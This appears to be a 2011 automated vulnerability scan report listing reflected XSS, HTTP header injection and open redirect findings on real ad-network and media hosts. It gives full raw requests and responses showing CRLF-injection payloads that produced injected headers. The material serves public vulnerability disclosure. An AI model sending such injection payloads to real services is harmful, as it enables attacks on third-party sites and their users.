XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, Keyword, Chelsea Handler, 05092011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 11:11:45 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

1.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.3. http://ad.doubleclick.net/getcamphist [src parameter]

1.4. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [name of an arbitrarily supplied request parameter]

1.5. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [secure parameter]

1.6. http://d.xp1.ru4.com/activity [redirect parameter]

1.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2. Cross-site scripting (reflected)

2.1. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 2]

2.2. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 3]

2.3. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [name of an arbitrarily supplied request parameter]

2.4. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [sz parameter]

2.5. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 2]

2.6. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 3]

2.7. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [name of an arbitrarily supplied request parameter]

2.8. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [sz parameter]

2.9. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 2]

2.10. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 3]

2.11. http://a.collective-media.net/adj/q1.q.gc.6008/life [name of an arbitrarily supplied request parameter]

2.12. http://a.collective-media.net/adj/q1.q.gc.6008/life [sz parameter]

2.13. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 1]

2.14. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 2]

2.15. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [REST URL parameter 3]

2.16. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [sz parameter]

2.17. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 1]

2.18. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 2]

2.19. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [REST URL parameter 3]

2.20. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [sz parameter]

2.21. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 1]

2.22. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 2]

2.23. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [REST URL parameter 3]

2.24. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [sz parameter]

2.25. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

2.26. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [&PID parameter]

2.27. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

2.28. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [AN parameter]

2.29. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

2.30. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [ASID parameter]

2.31. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

2.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]

2.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

2.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]

2.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

2.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]

2.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

2.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]

2.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

2.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]

2.41. http://ad.doubleclick.net/adj/blog.us.eonline/mm [name of an arbitrarily supplied request parameter]

2.42. http://ad.doubleclick.net/adj/trb.latimes/hp [name of an arbitrarily supplied request parameter]

2.43. http://ad.doubleclick.net/adj/trb.latimes/hp [rs parameter]

2.44. http://ads.bridgetrack.com/a/f/ [click parameter]

2.45. http://ads.bridgetrack.com/a/f/ [click parameter]

2.46. http://ads.bridgetrack.com/a/f/ [name of an arbitrarily supplied request parameter]

2.47. http://api.bit.ly/v3/shorten [callback parameter]

2.48. http://api.bit.ly/v3/shorten [longUrl parameter]

2.49. http://api.collarity.com/collarity/cws/v3/uQry [appid parameter]

2.50. http://api.collarity.com/collarity/cws/v3/uQry [callback parameter]

2.51. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

2.52. http://api.tweetmeme.com/url_info.jsonc [url parameter]

2.53. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.54. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.55. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.56. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.57. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.58. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.59. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.60. http://cdn.w55c.net/i/0RJOffplIg_1080158746.html [btid parameter]

2.61. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]

2.62. http://courier-journal.us.intellitxt.com/al.asp [jscallback parameter]

2.63. http://courier-journal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

2.64. http://courier-journal.us.intellitxt.com/v4/init [jscallback parameter]

2.65. http://courier-journal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

2.66. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 1]

2.67. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 2]

2.68. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 3]

2.69. http://feed-rt.baronsoffers.com/offer/feed/q/aT0xNDA5LHM9MzAweDI1MCxuPWlmcmFtZSxiPTA= [REST URL parameter 4]

2.70. http://js.revsci.net/gateway/gw.js [csid parameter]

2.71. http://lingows.appspot.com/bubble/ [request_id parameter]

2.72. http://lingows.appspot.com/bubble/ [respond_path parameter]

2.73. http://odb.outbrain.com/utils/odb [callback parameter]

2.74. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

2.75. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

2.76. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpcb parameter]

2.77. http://sitelife.courier-journal.com/ver1.0/daapi2.api [jpctx parameter]

2.78. http://todayshow.us.intellitxt.com/al.asp [jscallback parameter]

2.79. http://todayshow.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

2.80. http://todayshow.us.intellitxt.com/v3/door.jsp [sest parameter]

2.81. http://www.polls.newsvine.com/_api/comments/getComments [jsoncallback parameter]

2.82. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]

2.83. http://www.publishersweekly.com/pw/ajax.xml [REST URL parameter 2]

2.84. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]

2.85. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 2]

2.86. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]

2.87. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 5]

2.88. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]

2.89. http://www.publishersweekly.com/pw/by-topic/book-news/page-to-screen/article/47134-authors-on-the-air-demetri-martin-chelsea-handler-julie-andrews.html [REST URL parameter 6]

2.90. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent [cli cookie]

2.91. http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life [cli cookie]

2.92. http://a.collective-media.net/cmadj/q1.q.gc.6008/life [cli cookie]

2.93. http://optimized-by.rubiconproject.com/a/7476/12017/24449-15.js [ruid cookie]

3. Open redirection

3.1. http://ad.trafficmp.com/a/bpix [r parameter]

3.2. http://b.scorecardresearch.com/r [d.c parameter]

3.3. http://core.insightexpressai.com/adServer/adServerESI.aspx [redir parameter]

3.4. http://d.xp1.ru4.com/activity [redirect parameter]


1. HTTP header injection  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f8d99%0d%0aa339ba63673 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f8d99%0d%0aa339ba63673;src=2183402;type=count651;cat=msnbc778;ord=1;num=7558945417404.175? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/f8d99
a339ba63673;src=2183402;type=count651;cat=msnbc778;ord=1;num=7558945417404.175:
Date: Mon, 09 May 2011 16:02:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ce1c5%0d%0a278db742e5d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifce1c5%0d%0a278db742e5d?0.6100428786594421 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.eonline.com/uberblog/b240717_chelsea_handler_heading_big-screen_mall.html?cmpid=rss-000000-rssfeed-365-topstories&utm_source=eonline&utm_medium=rssfeeds&utm_campaign=rss_topstories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifce1c5
278db742e5d:
Date: Mon, 09 May 2011 16:03:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
1.3. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload d9b68%0d%0a0947d326282 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs91603032278362%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D9%252F4%252F2011%252011%253A4%253A53%25201%2520300%26pageName%3Ditunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26r%3Dhttp%253A%252F%252Fc.itunes.apple.com%252FWebObjects%252FMZConnections.woa%252Fwa%252FviewProfile%253Fid%253D1050896759%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26c5%3Dwin32%26c6%3D%253A%2520itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26v6%3Dwww-itsthanku-071220v%26c9%3Dwindows%26v9%3Dwww-itsthanku-071220p%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1066%26bh%3D968%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1d9b68%0d%0a0947d326282&A2S=1;ord=2108736436 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/affiliates/download/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s91603032278362?AQB=1&vvpr=true&&ndh=1&t=9%2F4%2F2011%2011%3A4%3A53%201%20300&pageName=itunes%20-%20affiliates%20-%20download%20itunes%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&r=http%3A%2F%2Fc.itunes.apple.com%2FWebObjects%2FMZConnections.woa%2Fwa%2FviewProfile%3Fid%3D1050896759&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&c5=win32&c6=%3A%20itunes%20-%20affiliates%20-%20download%20itunes%20(us)&v6=www-itsthanku-071220v&c9=windows&v9=www-itsthanku-071220p&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1d9b68
0947d326282&A2S=1/respcamphist;src=1513429;rch=2;lastimp=240233805;lastimptime=1304955615;lis=567251;lip=63054563;lic=28638481;lir=28656360;lirv=2;likv=0;lipn=B5461009;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1304957118:
Date: Mon, 09 May 2011 16:05:17 GMT
Server: GFE/2.0
Content-Type: text/html

1.4. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_louisville_cim/courier-journal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 9944f%0d%0a60fef41e701 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_louisville_cim/courier-journal;secure=false;position=3;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304957021024?&9944f%0d%0a60fef41e701=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Acourier-journal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;240697053;2-0;0;60813374;24/24;42010201/42027988/1;;~aopt=2/1/22/0;~okv=;secure=false;position=3;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;;9944f
60fef41e701=1;~cs=m:
Date: Mon, 09 May 2011 16:04:03 GMT
Content-Length: 1077

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;240697053;2-0;0;60813374;24/24;42010201/42027988/1;;~aopt=2/1/22/0;~okv=;secure=false;position=3;ic22=1;ic19=1;i
...[SNIP]...
1.5. http://ad.doubleclick.net/pfadx/gannett_louisville_cim/courier-journal [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_louisville_cim/courier-journal

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 9df8a%0d%0a85a8c87a4d7 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_louisville_cim/courier-journal;secure=9df8a%0d%0a85a8c87a4d7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Acourier-journal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:03:59 GMT
Expires: Mon, 09 May 2011 16:03:59 GMT
DCLK_imp: v7;x;44306;0-0;0;60813374;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=9df8a
85a8c87a4d7;~cs=y:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/x;44306;0-0;0;60813374;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...
1.6. http://d.xp1.ru4.com/activity [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload de2b1%0d%0a947f41459ce was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=de2b1%0d%0a947f41459ce&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 09 May 2011 16:03:36 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://de2b1
947f41459ce?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close

1.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 1b9c5%0d%0a8a1db01b318 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ABV&si=13015&pi=L&xs=3&pu=http%253A//today.msnbc.msn.com/id/42953716/ns/today-books/%253Fifu%253D%2526cmmiss%253D-1%2526cmkw%253D&df=1&v=5.5&cb=56991 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; Tsid=0^1304955421^1304957226|18181^1304955421^1304957226; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; N=2:cce56ea51bb938bc8d726cc79d6aee7f,cce56ea51bb938bc8d726cc79d6aee7f1b9c5%0d%0a8a1db01b318; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:20 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:18:20 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:03:20 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561800; path=/; expires=Mon, 16-May-11 16:03:20 GMT; domain=tacoda.at.atwola.com
